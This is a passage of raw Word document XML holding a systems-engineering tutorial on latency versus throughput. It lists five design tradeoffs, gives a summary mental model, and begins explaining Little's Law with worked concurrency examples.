        </w:rPr>
        <w:t>11.1 The Five Key Tradeoffs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63882C81" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Latency vs. Throughput (batching):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A203CC2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C7CDE5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>More batching → higher throughput, higher latency per item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2932A7EE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Less batching → lower latency, lower throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176111DB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Latency vs. Consistency (replication):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F6C179" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7268FA4C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Sync replication → consistent reads, higher write latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4057306B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Async replication → lower write latency, stale reads possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE95E8C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Throughput vs. Cost (resources):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DD0D5A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25563680" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>More servers → higher throughput, higher cost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77758944" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Fewer servers → lower cost, lower throughput (or higher latency at same throughput)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731FDB74" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Latency vs. Durability (persistence):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2832E4C2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437EA471" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Sync disk write → durable, higher latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C776534" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Async write / memory only → lower latency, risk of data loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B727A25" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Throughput vs. Correctness (ordering/serialization):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C4B9D4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6319D26E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Serial processing → correct ordering, limited throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AAACAF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Parallel processing → higher throughput, complex ordering/consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAFB6E6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 The Complete Mental Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1608832D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9D2538" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>┌───────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA9C750" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>│                                                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E50061A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>│   Throughput = f(Parallelism, Efficiency, Capacity)       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F06FC91" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>│                                                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1440CE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>│   Latency = f(Distance, Computation, Queuing, I/O)        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76072208" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>│                                                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB18F36" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>│   At low load: independent (optimize separately)          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CFB94C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>│   At high load: coupled (queuing links them)              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340478AB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>│                                                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A960CB7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>│   Little's Law: Concurrency = Throughput × Latency        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5972A517" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>│                                                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3450AE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>│   To scale:                                               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5807D736" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>│     Throughput → add parallelism (horizontal scaling)     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD80EB4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>│     Latency → reduce distance (caching, locality)         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB8F24B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>│     Both → eliminate bottlenecks (serial sections)         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78341E74" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>│                                                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028147F9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>└───────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B2CA70" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The system designer's job:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0D0042" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1436"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Measure</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> actual throughput and latency (not assume).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCFBF16" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1436"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identify</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> the bottleneck (is it bandwidth? CPU? I/O? network RTT? queueing?).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE2AA67" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1436"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Optimize</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> the bottleneck (the ONLY place where optimization matters — Amdahl's Law).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AFEB31" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1436"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> for changes (new bottlenecks emerge as old ones are fixed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE6C00" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1436"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Plan capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> with headroom (never run above 70% utilization in production).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E2147E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency is the speed of one. Throughput is the speed of many. The art of system design is achieving both simultaneously — low latency per request AND high aggregate throughput — by eliminating serial bottlenecks, minimizing distance, maximizing parallelism, and keeping utilization below the queuing theory knee.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464A18BB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Throughput and Latency — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A39873" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="455B6484">
          <v:rect id="_x0000_i5195" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="561C3770" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Throughput and Latency Actually Are (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13879E5B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Throughput and latency are not simply "how fast a system is." That conflation is the source of more architectural mistakes, misguided optimizations, and production incidents than almost any other conceptual error in systems engineering. They are </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>two fundamentally different, often opposing properties of a system</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> that measure entirely different things, respond to entirely different interventions, and cannot be simultaneously maximized without trade-offs that run all the way down to physics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D2B44B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> is the time elapsed between a cause and its effect — between a request being sent and a response being received. It is a </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>property of a single transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve"> measured in </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>units of time (nanoseconds, milliseconds, seconds). It answers: "How long did this one thing take?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325B73AB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> is the rate at which a system completes work — requests per second, bytes per second, transactions per minute. It is a </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>property of a system measured over time</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> in units of work per unit time. It answers: "How much can this system do per second?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79713977" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>The engineering problem is that these two properties are related by a </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fundamental law</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> (Little's Law), yet optimizing one often degrades the other. Understanding why requires going deeper than the metrics themselves to the underlying mechanics of queuing, service time, and utilization — the physics of how work flows through systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B67BFA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The most important non-obvious fact:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Latency and throughput are not independent variables you can tune separately. They are coupled through the system's </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>utilization</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> — how busy the system's resources are. This coupling creates one of the most counter-intuitive phenomena in systems engineering: </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>adding more load to a system can cause latency to increase dramatically before throughput increases at all.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Understanding why this happens — and engineering systems to resist it — is the core skill this topic covers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBECF1A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="5E2C0527">
          <v:rect id="_x0000_i5196" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="791C1BDE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Little's Law — The Master Equation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46660491" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Law and Its Derivation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C9FE53" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Little's Law</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> is the foundational equation of queuing theory, proven rigorously by John Little in 1961. It applies to any stable system in a steady state:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E9337" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D26F62" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>L = λ × W</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F07EA9A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="2DBFF448" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>L = average number of items in the system (in-flight requests)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380B3BEF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>λ = average arrival rate (requests per second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22070822" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>W = average time an item spends in the system (latency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CFBEB2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The three equivalent perspectives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D36AEF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA3C7A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>L = λ × W    → Given arrival rate and latency, compute concurrency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAEE339" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>λ = L / W    → Given concurrency and latency, compute throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064FBF74" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>W = L / λ    → Given concurrency and arrival rate, compute latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C706C07" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A concrete example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FED2CCC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>A web service receives 1,000 requests/second (λ = 1,000). Each request takes 50ms to process (W = 0.05s). Little's Law gives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DC694D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC064A0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>L = 1,000 × 0.05 = 50 concurrent requests in the system at any moment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E103B4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>This is not an approximation — it is exact in steady state. If you observe that the system always has ~50 in-flight requests and latency is 50ms, throughput must be exactly 1,000 RPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0057BF00" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The practical implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414715BA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Implication 1 — Concurrency is constrained by latency × throughput:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> If you want to serve 10,000 RPS with 100ms latency, you must support 1,000 concurrent in-flight requests (threads, connections, goroutines). Thread pool sizing, connection pool sizing, and file descriptor limits must accommodate L = λ × W.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F195949" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Implication 2 — Latency increases at constant throughput mean more concurrency:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> If throughput is constant at 1,000 RPS but latency increases from 50ms to 500ms (slowdown):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A833024" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DAC120" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>L = 1,000 × 0.5 = 500 concurrent requests</w:t>
      </w:r>
    </w:p>
